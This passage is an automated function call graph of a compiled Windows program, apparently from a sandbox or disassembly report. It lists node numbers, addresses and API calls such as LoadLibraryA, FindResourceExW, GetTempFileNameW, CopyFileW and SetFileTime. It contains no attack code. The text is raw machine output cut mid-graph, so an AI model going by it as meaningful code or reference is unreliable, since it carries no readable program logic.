93751 f07c0e 47 API calls __getptd_noexit 93718->93751 93725 f03614 __wsopen_helper 93720->93725 93729 f04e1c 93720->93729 93721 f03609 93752 f06e10 8 API calls __ftell_nolock 93721->93752 93725->93547 93730 f04e2c 93729->93730 93731 f04e4e EnterCriticalSection 93729->93731 93730->93731 93732 f04e34 93730->93732 93733 f0362e 93731->93733 93754 f07cf4 93732->93754 93735 f03578 93733->93735 93736 f03587 93735->93736 93737 f0359b 93735->93737 93839 f07c0e 47 API calls __getptd_noexit 93736->93839 93743 f03597 93737->93743 93799 f02c84 93737->93799 93739 f0358c 93840 f06e10 8 API calls __ftell_nolock 93739->93840 93753 f03653 LeaveCriticalSection LeaveCriticalSection _fprintf 93743->93753 93747 f035b5 93816 f0e9d2 93747->93816 93749 f035bb 93749->93743 93750 f01c9d _free 47 API calls 93749->93750 93750->93743 93751->93721 93752->93725 93753->93725 93755 f07d05 93754->93755 93756 f07d18 EnterCriticalSection 93754->93756 93761 f07d7c 93755->93761 93756->93733 93758 f07d0b 93758->93756 93785 f0115b 47 API calls 3 library calls 93758->93785 93762 f07d88 __wsopen_helper 93761->93762 93763 f07d91 93762->93763 93764 f07da9 93762->93764 93786 f081c2 47 API calls __NMSG_WRITE 93763->93786 93769 f07e11 __wsopen_helper 93764->93769 93778 f07da7 93764->93778 93766 f07d96 93787 f0821f 47 API calls 6 library calls 93766->93787 93769->93758 93770 f07dbd 93772 f07dd3 93770->93772 93773 f07dc4 93770->93773 93771 f07d9d 93788 f01145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93771->93788 93774 f07cf4 __lock 46 API calls 93772->93774 93790 f07c0e 47 API calls __getptd_noexit 93773->93790 93777 f07dda 93774->93777 93780 f07de9 InitializeCriticalSectionAndSpinCount 93777->93780 93781 f07dfe 93777->93781 93778->93764 93789 f069d0 47 API calls __crtLCMapStringA_stat 93778->93789 93779 f07dc9 93779->93769 93782 f07e04 93780->93782 93791 f01c9d 93781->93791 93797 f07e1a LeaveCriticalSection _doexit 93782->93797 93786->93766 93787->93771 93789->93770 93790->93779 93792 f01ca6 RtlFreeHeap 93791->93792 93796 f01ccf __dosmaperr 93791->93796 93793 f01cbb 93792->93793 93792->93796 93798 f07c0e 47 API calls __getptd_noexit 93793->93798 93795 f01cc1 GetLastError 93795->93796 93796->93782 93797->93769 93798->93795 93800 f02c97 93799->93800 93804 f02cbb 93799->93804 93801 f02933 __ftell_nolock 47 API calls 93800->93801 93800->93804 93802 f02cb4 93801->93802 93841 f0af61 93802->93841 93805 f0eb36 93804->93805 93806 f0eb43 93805->93806 93808 f035af 93805->93808 93807 f01c9d _free 47 API calls 93806->93807 93806->93808 93807->93808 93809 f02933 93808->93809 93810 f02952 93809->93810 93811 f0293d 93809->93811 93810->93747 93978 f07c0e 47 API calls __getptd_noexit 93811->93978 93813 f02942 93979 f06e10 8 API calls __ftell_nolock 93813->93979 93815 f0294d 93815->93747 93817 f0e9de __wsopen_helper 93816->93817 93818 f0e9e6 93817->93818 93819 f0e9fe 93817->93819 93995 f07bda 47 API calls __getptd_noexit 93818->93995 93821 f0ea7b 93819->93821 93826 f0ea28 93819->93826 93999 f07bda 47 API calls __getptd_noexit 93821->93999 93822 f0e9eb 93996 f07c0e 47 API calls __getptd_noexit 93822->93996 93825 f0ea80 94000 f07c0e 47 API calls __getptd_noexit 93825->94000 93829 f0a8ed ___lock_fhandle 49 API calls 93826->93829 93827 f0e9f3 __wsopen_helper 93827->93749 93831 f0ea2e 93829->93831 93830 f0ea88 94001 f06e10 8 API calls __ftell_nolock 93830->94001 93833 f0ea41 93831->93833 93834 f0ea4c 93831->93834 93980 f0ea9c 93833->93980 93997 f07c0e 47 API calls __getptd_noexit 93834->93997 93837 f0ea47 93998 f0ea73 LeaveCriticalSection __unlock_fhandle 93837->93998 93839->93739 93840->93743 93842 f0af6d __wsopen_helper 93841->93842 93843 f0af75 93842->93843 93844 f0af8d 93842->93844 93939 f07bda 47 API calls __getptd_noexit 93843->93939 93846 f0b022 93844->93846 93851 f0afbf 93844->93851 93944 f07bda 47 API calls __getptd_noexit 93846->93944 93847 f0af7a 93940 f07c0e 47 API calls __getptd_noexit 93847->93940 93850 f0b027 93945 f07c0e 47 API calls __getptd_noexit 93850->93945 93866 f0a8ed 93851->93866 93854 f0b02f 93946 f06e10 8 API calls __ftell_nolock 93854->93946 93855 f0afc5 93857 f0afd8 93855->93857 93858 f0afeb 93855->93858 93875 f0b043 93857->93875 93941 f07c0e 47 API calls __getptd_noexit 93858->93941 93860 f0af82 __wsopen_helper 93860->93804 93862 f0afe4 93943 f0b01a LeaveCriticalSection __unlock_fhandle 93862->93943 93863 f0aff0 93942 f07bda 47 API calls __getptd_noexit 93863->93942 93867 f0a8f9 __wsopen_helper 93866->93867 93868 f0a946 EnterCriticalSection 93867->93868 93869 f07cf4 __lock 47 API calls 93867->93869 93870 f0a96c __wsopen_helper 93868->93870 93871 f0a91d 93869->93871 93870->93855 93872 f0a928 InitializeCriticalSectionAndSpinCount 93871->93872 93873 f0a93a 93871->93873 93872->93873 93947 f0a970 LeaveCriticalSection _doexit 93873->93947 93876 f0b050 __ftell_nolock 93875->93876 93877 f0b0ac 93876->93877 93878 f0b08d 93876->93878 93908 f0b082 93876->93908 93882 f0b105 93877->93882 93883 f0b0e9 93877->93883 93957 f07bda 47 API calls __getptd_noexit 93878->93957 93881 f0b092 93958 f07c0e 47 API calls __getptd_noexit 93881->93958 93886 f0b11c 93882->93886 93963 f0f82f 49 API calls 3 library calls 93882->93963 93960 f07bda 47 API calls __getptd_noexit 93883->93960 93884 f0b86b 93884->93862 93948 f13bf2 93886->93948 93888 f0b099 93959 f06e10 8 API calls __ftell_nolock 93888->93959 93891 f0b0ee 93961 f07c0e 47 API calls __getptd_noexit 93891->93961 93893 f0b12a 93895 f0b44b 93893->93895 93964 f07a0d 47 API calls 2 library calls 93893->93964 93897 f0b463 93895->93897 93898 f0b7b8 WriteFile 93895->93898 93896 f0b0f5 93962 f06e10 8 API calls __ftell_nolock 93896->93962 93902 f0b55a 93897->93902 93906 f0b479 93897->93906 93900 f0b7e1 GetLastError 93898->93900 93910 f0b410 93898->93910 93900->93910 93913 f0b663 93902->93913 93916 f0b565 93902->93916 93903 f0b150 GetConsoleMode 93903->93895 93905 f0b189 93903->93905 93904 f0b81b 93904->93908 93969 f07c0e 47 API calls __getptd_noexit 93904->93969 93905->93895 93911 f0b199 GetConsoleCP 93905->93911 93906->93904 93907 f0b4e9 WriteFile 93906->93907 93907->93900 93912 f0b526 93907->93912 93971 f0a70c 93908->93971 93910->93904 93910->93908 93915 f0b7f7 93910->93915 93911->93910 93935 f0b1c2 93911->93935 93912->93906 93912->93910 93927 f0b555 93912->93927 93913->93904 93917 f0b6d8 WideCharToMultiByte 93913->93917 93914 f0b843 93970 f07bda 47 API calls __getptd_noexit 93914->93970 93919 f0b812 93915->93919 93920 f0b7fe 93915->93920 93916->93904 93921 f0b5de WriteFile 93916->93921 93917->93900 93932 f0b71f 93917->93932 93968 f07bed 47 API calls 3 library calls 93919->93968 93966 f07c0e 47 API calls __getptd_noexit 93920->93966 93921->93900 93923 f0b62d 93921->93923 93923->93910 93923->93916 93923->93927 93925 f0b727 WriteFile 93929 f0b77a GetLastError 93925->93929 93925->93932 93926 f0b803 93967 f07bda 47 API calls __getptd_noexit 93926->93967 93927->93910 93929->93932 93931 f140f7 59 API calls __chsize_nolock 93931->93935 93932->93910 93932->93913 93932->93925 93932->93927 93933 f15884 WriteConsoleW CreateFileW __chsize_nolock 93937 f0b2f6 93933->93937 93934 f0b28f WideCharToMultiByte 93934->93910 93936 f0b2ca WriteFile 93934->93936 93935->93910 93935->93931 93935->93934 93935->93937 93965 f01688 57 API calls __isleadbyte_l 93935->93965 93936->93900 93936->93937 93937->93900 93937->93910 93937->93933 93937->93935 93938 f0b321 WriteFile 93937->93938 93938->93900 93938->93937 93939->93847 93940->93860 93941->93863 93942->93862 93943->93860 93944->93850 93945->93854 93946->93860 93947->93868 93949 f13c0a 93948->93949 93950 f13bfd 93948->93950 93952 f07c0e __ftell_nolock 47 API calls 93949->93952 93954 f13c16 93949->93954 93951 f07c0e __ftell_nolock 47 API calls 93950->93951 93953 f13c02 93951->93953 93955 f13c37 93952->93955 93953->93893 93954->93893 93956 f06e10 __ftell_nolock 8 API calls 93955->93956 93956->93953 93957->93881 93958->93888 93959->93908 93960->93891 93961->93896 93962->93908 93963->93886 93964->93903 93965->93935 93966->93926 93967->93908 93968->93908 93969->93914 93970->93908 93972 f0a714 93971->93972 93973 f0a716 IsProcessorFeaturePresent 93971->93973 93972->93884 93975 f137b0 93973->93975 93976 f1375f ___raise_securityfailure 5 API calls 93975->93976 93977 f13893 93976->93977 93977->93884 93978->93813 93979->93815 94002 f0aba4 93980->94002 93982 f0eb00 94015 f0ab1e 48 API calls 2 library calls 93982->94015 93984 f0eaaa 93984->93982 93986 f0aba4 __lseek_nolock 47 API calls 93984->93986 93994 f0eade 93984->93994 93985 f0eb08 93993 f0eb2a 93985->93993 94016 f07bed 47 API calls 3 library calls 93985->94016 93988 f0ead5 93986->93988 93987 f0aba4 __lseek_nolock 47 API calls 93989 f0eaea CloseHandle 93987->93989 93991 f0aba4 __lseek_nolock 47 API calls 93988->93991 93989->93982 93992 f0eaf6 GetLastError 93989->93992 93991->93994 93992->93982 93993->93837 93994->93982 93994->93987 93995->93822 93996->93827 93997->93837 93998->93827 93999->93825 94000->93830 94001->93827 94003 f0abc4 94002->94003 94004 f0abaf 94002->94004 94009 f0abe9 94003->94009 94019 f07bda 47 API calls __getptd_noexit 94003->94019 94017 f07bda 47 API calls __getptd_noexit 94004->94017 94006 f0abb4 94018 f07c0e 47 API calls __getptd_noexit 94006->94018 94009->93984 94010 f0abf3 94020 f07c0e 47 API calls __getptd_noexit 94010->94020 94012 f0abfb 94021 f06e10 8 API calls __ftell_nolock 94012->94021 94013 f0abbc 94013->93984 94015->93985 94016->93993 94017->94006 94018->94013 94019->94010 94020->94012 94021->94013 94108 ee4214 94022->94108 94027 f54f73 94029 ee4252 84 API calls 94027->94029 94028 ee41d4 LoadLibraryExW 94118 ee4291 94028->94118 94031 f54f7a 94029->94031 94033 ee4291 3 API calls 94031->94033 94035 f54f82 94033->94035 94144 ee44ed 94035->94144 94036 ee41fb 94036->94035 94037 ee4207 94036->94037 94039 ee4252 84 API calls 94037->94039 94041 ee420c 94039->94041 94041->93562 94041->93564 94043 f54fa9 94152 ee4950 94043->94152 94327 f01e46 94046->94327 94050 f26918 _wcschr __ftell_nolock 94049->94050 94051 f01dfc __wsplitpath 47 API calls 94050->94051 94054 f2692e _wcscat _wcscpy 94050->94054 94052 f2695d 94051->94052 94053 f01dfc __wsplitpath 47 API calls 94052->94053 94053->94054 94054->93584 94056 f2bfb1 __ftell_nolock 94055->94056 94057 eff4ea 48 API calls 94056->94057 94058 f2c00e 94057->94058 94059 ee47b7 48 API calls 94058->94059 94060 f2c018 94059->94060 94061 f2bdb4 GetSystemTimeAsFileTime 94060->94061 94062 f2c023 94061->94062 94063 ee4517 83 API calls 94062->94063 94064 f2c036 _wcscmp 94063->94064 94065 f2c107 94064->94065 94066 f2c05a 94064->94066 94067 f2c56d 94 API calls 94065->94067 94370 f2c56d 94066->94370 94069 f2c0d3 _wcscat 94067->94069 94072 ee44ed 64 API calls 94069->94072 94097 f2c110 94069->94097 94071 f01dfc __wsplitpath 47 API calls 94076 f2c088 _wcscat _wcscpy 94071->94076 94073 f2c12c 94072->94073 94074 ee44ed 64 API calls 94073->94074 94075 f2c13c 94074->94075 94077 ee44ed 64 API calls 94075->94077 94078 f01dfc __wsplitpath 47 API calls 94076->94078 94079 f2c157 94077->94079 94078->94069 94080 ee44ed 64 API calls 94079->94080 94081 f2c167 94080->94081 94082 ee44ed 64 API calls 94081->94082 94083 f2c182 94082->94083 94084 ee44ed 64 API calls 94083->94084 94085 f2c192 94084->94085 94086 ee44ed 64 API calls 94085->94086 94087 f2c1a2 94086->94087 94088 ee44ed 64 API calls 94087->94088 94089 f2c1b2 94088->94089 94353 f2c71a GetTempPathW GetTempFileNameW 94089->94353 94091 f2c1be 94092 f03499 117 API calls 94091->94092 94100 f2c1cf 94092->94100 94093 f2c289 94094 f035e4 __fcloseall 83 API calls 94093->94094 94095 f2c294 94094->94095 94095->94097 94098 f2c342 CopyFileW 94095->94098 94101 f2c2b8 94095->94101 94096 ee44ed 64 API calls 94096->94100 94097->93590 94098->94097 94099 f2c32d 94098->94099 94099->94097 94367 f2c6d9 CreateFileW 94099->94367 94100->94093 94100->94096 94100->94097 94354 f02aae 94100->94354 94376 f2b965 118 API calls __fcloseall 94101->94376 94105->93553 94106->93574 94107->93581 94157 ee4339 94108->94157 94112 ee41bb 94115 f03499 94112->94115 94113 ee4244 FreeLibrary 94113->94112 94114 ee423c 94114->94112 94114->94113 94165 f034ae 94115->94165 94117 ee41c8 94117->94027 94117->94028 94244 ee42e4 94118->94244 94122 ee41ec 94125 ee4380 94122->94125 94123 ee42c1 FreeLibrary 94123->94122 94124 ee42b8 94124->94122 94124->94123 94126 eff4ea 48 API calls 94125->94126 94127 ee4395 94126->94127 94252 ee47b7 94127->94252 94129 ee43a1 ___crtGetEnvironmentStringsW 94130 ee43dc 94129->94130 94132 ee4499 94129->94132 94133 ee44d1 94129->94133 94131 ee4950 57 API calls 94130->94131 94139 ee43e5 94131->94139 94255 ee406b CreateStreamOnHGlobal 94132->94255 94266 f2c750 93 API calls 94133->94266 94136 ee44ed 64 API calls 94136->94139 94138 ee4479 94138->94036 94139->94136 94139->94138 94140 f54ed7 94139->94140 94261 ee4517 94139->94261 94141 ee4517 83 API calls 94140->94141 94142 f54eeb 94141->94142 94143 ee44ed 64 API calls 94142->94143 94143->94138 94145 ee44ff 94144->94145 94146 f54fc0 94144->94146 94284 f0381e 94145->94284 94149 f2bf5a 94304 f2bdb4 94149->94304 94151 f2bf70 94151->94043 94153 ee495f 94152->94153 94154 f55002 94152->94154 94309 f03e65 94153->94309 94156 ee4967 94161 ee434b 94157->94161 94160 ee4321 LoadLibraryA GetProcAddress 94160->94114 94162 ee422f 94161->94162 94163 ee4354 LoadLibraryA 94161->94163 94162->94114 94162->94160 94163->94162 94164 ee4365 GetProcAddress 94163->94164 94164->94162 94168 f034ba __wsopen_helper 94165->94168 94166 f034cd 94213 f07c0e 47 API calls __getptd_noexit 94166->94213 94168->94166 94170 f034fe 94168->94170 94169 f034d2 94214 f06e10 8 API calls __ftell_nolock 94169->94214 94184 f0e4c8 94170->94184 94173 f03503 94174 f03519 94173->94174 94175 f0350c 94173->94175 94177 f03543 94174->94177 94178 f03523 94174->94178 94215 f07c0e 47 API calls __getptd_noexit 94175->94215 94198 f0e5e0 94177->94198 94216 f07c0e 47 API calls __getptd_noexit 94178->94216 94180 f034dd __wsopen_helper @_EH4_CallFilterFunc@8 94180->94117 94185 f0e4d4 __wsopen_helper 94184->94185 94186 f07cf4 __lock 47 API calls 94185->94186 94196 f0e4e2 94186->94196 94187 f0e552 94218 f0e5d7 94187->94218 94188 f0e559 94223 f069d0 47 API calls __crtLCMapStringA_stat 94188->94223 94191 f0e560 94191->94187 94193 f0e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94191->94193 94192 f0e5cc __wsopen_helper 94192->94173 94193->94187 94194 f07d7c __mtinitlocknum 47 API calls 94194->94196 94196->94187 94196->94188 94196->94194 94221 f04e5b 48 API calls __lock 94196->94221 94222 f04ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94196->94222 94199 f0e600 __wopenfile 94198->94199 94200 f0e61a 94199->94200 94212 f0e7d5 94199->94212 94230 f0185b 59 API calls 2 library calls 94199->94230 94228 f07c0e 47 API calls __getptd_noexit 94200->94228 94202 f0e61f 94229 f06e10 8 API calls __ftell_nolock 94202->94229 94204 f0e838 94225 f163c9 94204->94225 94206 f0354e 94217 f03570 LeaveCriticalSection LeaveCriticalSection _fprintf 94206->94217 94208 f0e7ce 94208->94212 94231 f0185b 59 API calls 2 library calls 94208->94231 94210 f0e7ed 94210->94212 94232 f0185b 59 API calls 2 library calls 94210->94232 94212->94200 94212->94204 94213->94169 94214->94180 94215->94180 94216->94180 94217->94180 94224 f07e58 LeaveCriticalSection 94218->94224 94220 f0e5de 94220->94192 94221->94196 94222->94196 94223->94191 94224->94220 94233 f15bb1 94225->94233 94227 f163e2 94227->94206 94228->94202 94229->94206 94230->94208 94231->94210 94232->94212 94234 f15bbd __wsopen_helper 94233->94234 94235 f15bcf 94234->94235 94237 f15c06 94234->94237 94236 f07c0e __ftell_nolock 47 API calls 94235->94236 94238 f15bd4 94236->94238 94239 f15c78 __wsopen_helper 110 API calls 94237->94239 94240 f06e10 __ftell_nolock 8 API calls 94238->94240 94241 f15c23 94239->94241 94243 f15bde __wsopen_helper 94240->94243 94242 f15c4c __wsopen_helper LeaveCriticalSection 94241->94242 94242->94243 94243->94227 94248 ee42f6 94244->94248 94247 ee42cc LoadLibraryA GetProcAddress 94247->94124 94249 ee42aa 94248->94249 94250 ee42ff LoadLibraryA 94248->94250 94249->94124 94249->94247 94250->94249 94251 ee4310 GetProcAddress 94250->94251 94251->94249 94253 eff4ea 48 API calls 94252->94253 94254 ee47c9 94253->94254 94254->94129 94256 ee4085 FindResourceExW 94255->94256 94260 ee40a2 94255->94260 94257 f54f16 LoadResource 94256->94257 94256->94260 94258 f54f2b SizeofResource 94257->94258 94257->94260 94259 f54f3f LockResource 94258->94259 94258->94260 94259->94260 94260->94130 94262 ee4526 94261->94262 94265 f54fe0 94261->94265 94267 f03a8d 94262->94267 94264 ee4534 94264->94139 94266->94130 94268 f03a99 __wsopen_helper 94267->94268 94269 f03aa7 94268->94269 94270 f03acd 94268->94270 94280 f07c0e 47 API calls __getptd_noexit 94269->94280 94272 f04e1c __lock_file 48 API calls 94270->94272 94275 f03ad3 94272->94275 94273 f03aac 94281 f06e10 8 API calls __ftell_nolock 94273->94281 94282 f039fe 81 API calls 2 library calls 94275->94282 94277 f03ae2 94283 f03b04 LeaveCriticalSection LeaveCriticalSection _fprintf 94277->94283 94279 f03ab7 __wsopen_helper 94279->94264 94280->94273 94281->94279 94282->94277 94283->94279 94287 f03839 94284->94287 94286 ee4510 94286->94149 94288 f03845 __wsopen_helper 94287->94288 94289 f03888 94288->94289 94290 f0385b _memset 94288->94290 94291 f03880 __wsopen_helper 94288->94291 94292 f04e1c __lock_file 48 API calls 94289->94292 94300 f07c0e 47 API calls __getptd_noexit 94290->94300 94291->94286 94294 f0388e 94292->94294 94302 f0365b 62 API calls 5 library calls 94294->94302 94295 f03875 94301 f06e10 8 API calls __ftell_nolock 94295->94301 94298 f038a4 94303 f038c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94298->94303 94300->94295 94301->94291 94302->94298 94303->94291 94307 f0344a GetSystemTimeAsFileTime 94304->94307 94306 f2bdc3 94306->94151 94308 f03478 __aulldiv 94307->94308 94308->94306 94310 f03e71 __wsopen_helper 94309->94310 94311 f03e94 94310->94311 94312 f03e7f 94310->94312 94314 f04e1c __lock_file 48 API calls 94311->94314 94323 f07c0e 47 API calls __getptd_noexit 94312->94323 94316 f03e9a 94314->94316 94315 f03e84 94324 f06e10 8 API calls __ftell_nolock 94315->94324 94325 f03b0c 55 API calls 2 library calls 94316->94325 94319 f03ea5 94326 f03ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 94319->94326 94321 f03eb7 94322 f03e8f __wsopen_helper 94321->94322 94322->94156 94323->94315 94324->94322 94325->94319 94326->94321 94328 f01e55 94327->94328 94329 f01e61 94327->94329 94328->94329 94338 f01ed4 94328->94338 94346 f09d6b 47 API calls __ftell_nolock 94328->94346 94351 f07c0e 47 API calls __getptd_noexit 94329->94351 94331 f02019 94336 f01e41 94331->94336 94352 f06e10 8 API calls __ftell_nolock 94331->94352 94334 f01fa0 94334->94329 94334->94336 94339 f01fb0 94334->94339 94335 f01f5f 94335->94329 94337 f01f7b 94335->94337 94348 f09d6b 47 API calls __ftell_nolock 94335->94348 94336->93576 94337->94329 94337->94336 94342 f01f91 94337->94342 94338->94329 94345 f01f41 94338->94345 94347 f09d6b 47 API calls __ftell_nolock 94338->94347 94350 f09d6b 47 API calls __ftell_nolock 94339->94350 94349 f09d6b 47 API calls __ftell_nolock 94342->94349 94345->94334 94345->94335 94346->94338 94347->94345 94348->94337 94349->94336 94350->94336 94351->94331 94352->94336 94353->94091 94355 f02aba __wsopen_helper 94354->94355 94356 f02ad4 94355->94356 94357 f02aec 94355->94357 94358 f02ae4 __wsopen_helper 94355->94358 94389 f07c0e 47 API calls __getptd_noexit 94356->94389 94359 f04e1c __lock_file 48 API calls 94357->94359 94358->94100 94361 f02af2 94359->94361 94377 f02957 94361->94377 94362 f02ad9 94390 f06e10 8 API calls __ftell_nolock 94362->94390 94368 f2c715 94367->94368 94369 f2c6ff SetFileTime CloseHandle 94367->94369 94368->94097 94369->94368 94374 f2c581 __tzset_nolock _wcscmp 94370->94374 94371 ee44ed 64 API calls 94371->94374 94372 f2bf5a GetSystemTimeAsFileTime 94372->94374 94373 f2c05f 94373->94071 94373->94097 94374->94371 94374->94372 94374->94373 94375 ee4517 83 API calls 94374->94375 94375->94374 94376->94099 94380 f02966 94377->94380 94385 f02984 94377->94385 94378 f02974 94392 f07c0e 47 API calls __getptd_noexit 94378->94392 94380->94378 94381 f0299c ___crtGetEnvironmentStringsW 94380->94381 94380->94385 94381->94385 94386 f02c84 __flush 78 API calls 94381->94386 94387 f02933 __ftell_nolock 47 API calls 94381->94387 94388 f0af61 __flswbuf 78 API calls 94381->94388 94394 f08e63 78 API calls 5 library calls 94381->94394 94382 f02979 94393 f06e10 8 API calls __ftell_nolock 94382->94393 94391 f02b24 LeaveCriticalSection LeaveCriticalSection _fprintf 94385->94391 94386->94381 94387->94381 94388->94381 94389->94362 94390->94358 94391->94358 94392->94382 94393->94385 94394->94381 94396 f26529 94395->94396 94397 f26cc4 FindFirstFileW 94395->94397 94396->93453 94397->94396 94398 f26cd9 FindClose 94397->94398 94398->94396 94399->93635 94400->93601 94401->93609 94402->93611 94403->93618 94404->93627 94405->93629 94406->93633 94407->93320 94408->93320 94409->93321 94410->93321 94411->93312 94412->93307 94413->93322 94414->93334 94415->93334 94416->93335 94417->93352 94418->93357 94419 f2bb64 94420 f2bb71 94419->94420 94423 f2bb77 94419->94423 94421 f01c9d _free 47 API calls 94420->94421 94421->94423 94422 f2bb88 94425 f2bb9a 94422->94425 94426 f01c9d _free 47 API calls 94422->94426 94423->94422 94424 f01c9d _free 47 API calls 94423->94424 94424->94422 94426->94425 94427 f519dd 94432 ee4a30 94427->94432 94429 f519f1 94452 f00f0a 52 API calls __cinit 94429->94452 94431 f519fb 94433 ee4a40 __ftell_nolock 94432->94433 94434 eed7f7 48 API calls 94433->94434 94435 ee4af6 94434->94435 94453 ee5374 94435->94453 94437 ee4aff 94460 ee363c 94437->94460 94444 eed7f7 48 API calls 94445 ee4b32 94444->94445 94482 ee49fb 94445->94482 94447 ee4b43 Mailbox 94447->94429 94448 ee61a6 48 API calls 94449 ee4b3d _wcscat Mailbox __wsetenvp 94448->94449 94449->94447 94449->94448 94450 eece19 48 API calls 94449->94450 94451 ee64cf 48 API calls 94449->94451 94450->94449 94451->94449 94452->94431 94496 f0f8a0 94453->94496 94456 eece19 48 API calls 94457 ee53a7 94456->94457 94498 ee660f 94457->94498 94459 ee53b1 Mailbox 94459->94437 94461 ee3649 __ftell_nolock 94460->94461 94525 ee366c GetFullPathNameW 94461->94525 94463 ee365a 94464 ee6a63 48 API calls 94463->94464 94465 ee3669 94464->94465 94466 ee518c 94465->94466 94467 ee5197 94466->94467 94468 ee519f 94467->94468 94469 f51ace 94467->94469 94527 ee5130 94468->94527 94470 ee6b4a 48 API calls 94469->94470 94473 f51adb __wsetenvp 94470->94473 94472 ee4b18 94476 ee64cf 94472->94476 94474 efee75 48 API calls 94473->94474 94475 f51b07 ___crtGetEnvironmentStringsW 94474->94475 94477 ee651b 94476->94477 94481 ee64dd ___crtGetEnvironmentStringsW 94476->94481 94479 eff4ea 48 API calls 94477->94479 94478 eff4ea 48 API calls 94480 ee4b29 94478->94480 94479->94481 94480->94444 94481->94478 94537 eebcce 94482->94537 94485 ee4a2b 94485->94449 94486 f541cc RegQueryValueExW 94487 f541e5 94486->94487 94488 f54246 RegCloseKey 94486->94488 94489 eff4ea 48 API calls 94487->94489 94490 f541fe 94489->94490 94491 ee47b7 48 API calls 94490->94491 94492 f54208 RegQueryValueExW 94491->94492 94493 f54224 94492->94493 94495 f5423b 94492->94495 94494 ee6a63 48 API calls 94493->94494 94494->94495 94495->94488 94497 ee5381 GetModuleFileNameW 94496->94497 94497->94456 94499 f0f8a0 __ftell_nolock 94498->94499 94500 ee661c GetFullPathNameW 94499->94500 94505 ee6a63 94500->94505 94502 ee6643 94516 ee6571 94502->94516 94506 ee6adf 94505->94506 94507 ee6a6f __wsetenvp 94505->94507 94521 eeb18b 94506->94521 94509 ee6a8b 94507->94509 94510 ee6ad7 94507->94510 94512 ee6b4a 48 API calls 94509->94512 94520 eec369 48 API calls 94510->94520 94513 ee6a95 94512->94513 94515 efee75 48 API calls 94513->94515 94514 ee6ab6 ___crtGetEnvironmentStringsW 94514->94502 94515->94514 94517 ee657f 94516->94517 94518 eeb18b 48 API calls 94517->94518 94519 ee658f 94518->94519 94519->94459 94520->94514 94522 eeb199 94521->94522 94524 eeb1a2 ___crtGetEnvironmentStringsW 94521->94524 94523 eebdfa 48 API calls 94522->94523 94522->94524 94523->94524 94524->94514 94526 ee368a 94525->94526 94526->94463 94528 ee513f __wsetenvp 94527->94528 94529 f51b27 94528->94529 94530 ee5151 94528->94530 94532 ee6b4a 48 API calls 94529->94532 94531 eebb85 48 API calls 94530->94531 94534 ee515e ___crtGetEnvironmentStringsW 94531->94534 94533 f51b34 94532->94533 94535 efee75 48 API calls 94533->94535 94534->94472 94536 f51b57 ___crtGetEnvironmentStringsW 94535->94536 94538 eebce8 94537->94538 94542 ee4a0a RegOpenKeyExW 94537->94542 94539 eff4ea 48 API calls 94538->94539 94540 eebcf2 94539->94540 94541 efee75 48 API calls 94540->94541 94541->94542 94542->94485 94542->94486 94543 f59bec 94558 ef0ae0 Mailbox ___crtGetEnvironmentStringsW 94543->94558 94545 ef1526 Mailbox 94639 f2cc5c 86 API calls 4 library calls 94545->94639 94548 eff4ea 48 API calls 94549 eefec8 94548->94549 94549->94548 94550 ef0509 94549->94550 94551 ef1473 94549->94551 94553 eeffe1 Mailbox 94549->94553 94554 ef146e 94549->94554 94556 ee6eed 48 API calls 94549->94556 94559 f5a246 94549->94559 94567 f197ed InterlockedDecrement 94549->94567 94568 eed7f7 48 API calls 94549->94568 94569 f5a30e 94549->94569 94571 f00f0a 52 API calls __cinit 94549->94571 94573 f5a973 94549->94573 94577 ef15b5 94549->94577 94634 ef1820 331 API calls 2 library calls 94549->94634 94635 ef1d10 59 API calls Mailbox 94549->94635 94642 f2cc5c 86 API calls 4 library calls 94550->94642 94641 f2cc5c 86 API calls 4 library calls 94551->94641 94561 ee6eed 48 API calls 94554->94561 94556->94549 94558->94545 94558->94549 94558->94553 94570 eece19 48 API calls 94558->94570 94576 f3e822 331 API calls 94558->94576 94578 eefe30 331 API calls 94558->94578 94579 f5a706 94558->94579 94581 eff4ea 48 API calls 94558->94581 94582 f197ed InterlockedDecrement 94558->94582 94586 f40d09 94558->94586 94589 f2b55b 94558->94589 94593 f40d1d 94558->94593 94596 f3f0ac 94558->94596 94628 f2a6ef 94558->94628 94636 f3ef61 82 API calls 2 library calls 94558->94636 94565 ee6eed 48 API calls 94559->94565 94560 f5a922 94561->94553 94565->94553 94566 f5a873 94567->94549 94568->94549 94569->94553 94637 f197ed InterlockedDecrement 94569->94637 94570->94558 94571->94549 94643 f2cc5c 86 API calls 4 library calls 94573->94643 94575 f5a982 94576->94558 94640 f2cc5c 86 API calls 4 library calls 94577->94640 94578->94558 94638 f2cc5c 86 API calls 4 library calls 94579->94638 94581->94558 94582->94558 94644 f3f8ae 94586->94644 94588 f40d19 94588->94558 94590 f2b564 94589->94590 94592 f2b569 94589->94592 94742 f2a4d5 94590->94742 94592->94558 94594 f3f8ae 129 API calls 94593->94594 94595 f40d2d 94594->94595 94595->94558 94597 eed7f7 48 API calls 94596->94597 94598 f3f0c0 94597->94598 94599 eed7f7 48 API calls 94598->94599 94600 f3f0c8 94599->94600 94601 eed7f7 48 API calls 94600->94601 94602 f3f0d0 94601->94602 94603 ee936c 81 API calls 94602->94603 94615 f3f0de 94603->94615 94604 ee6a63 48 API calls 94604->94615 94605 f3f2cc 94606 f3f2f9 Mailbox 94605->94606 94774 ee6b68 48 API calls 94605->94774 94606->94558 94608 f3f2b3 94609 ee518c 48 API calls 94608->94609 94612 f3f2c0 94609->94612 94610 f3f2ce 94614 ee518c 48 API calls 94610->94614 94611 ee6eed 48 API calls 94611->94615 94765 ee510d 94612->94765 94613 eec799 48 API calls 94613->94615 94618 f3f2dd 94614->94618 94615->94604 94615->94605 94615->94606 94615->94608 94615->94610 94615->94611 94615->94613 94616 eebdfa 48 API calls 94615->94616 94619 eebdfa 48 API calls 94615->94619 94625 ee936c 81 API calls 94615->94625 94626 ee518c 48 API calls 94615->94626 94627 ee510d 48 API calls 94615->94627 94620 f3f175 CharUpperBuffW 94616->94620 94621 ee510d 48 API calls 94618->94621 94622 f3f23a CharUpperBuffW 94619->94622 94623 eed645 53 API calls 94620->94623 94621->94605 94764 efd922 55 API calls 2 library calls 94622->94764 94623->94615 94625->94615 94626->94615 94627->94615 94629 f2a6fb 94628->94629 94630 eff4ea 48 API calls 94629->94630 94631 f2a709 94630->94631 